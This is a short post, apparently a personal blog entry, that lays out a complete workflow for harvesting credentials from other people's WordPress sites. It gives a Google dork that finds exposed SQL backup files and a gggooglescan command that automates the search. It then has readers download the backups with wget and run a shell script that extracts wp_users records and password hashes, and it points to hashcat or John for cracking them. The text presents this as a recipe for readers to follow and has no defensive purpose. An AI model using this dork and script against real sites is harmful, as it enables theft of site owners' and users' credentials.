There are a lot of backup’s found on google. Google ‘dork’: filetype:sql inurl:wp-content/backup-* For automatic googling I use gggooglescan, works like a charm and I can output the scan to wget or whatever.
./gggooglescan -d 10 -l backupsql.log ‘filetype:sql inurl:wp-content/backup-*’
I find a few direct url’s to backup sql databasefiles. After downloading some with wget I want to get those hashes 🙂 so, little script I made: extractWPUserinfo.sh
cat “$1” | grep “INSERT INTO \`wp_users\` VALUES” | sed “s/, /\n/g” | sed “s/INSERT INTO \`wp_users\` VALUES (/userid: /g” | sed “s/);/\n\n/g” | sed “s/’//g” > “$1″_WPuserinfo.txt
cat “$1″_WPuserinfo.txt | grep -o “$P$.*” > “$1″_WPuser_hashes.txt
I will give 2 files, 1 with all the userinfo, second only the hashes. You can use hashcat or John or whatever to bruteforce them. (WordPress hash bruteforcing is slow! it’s a kinda salted MD5 and then 42 times calculated)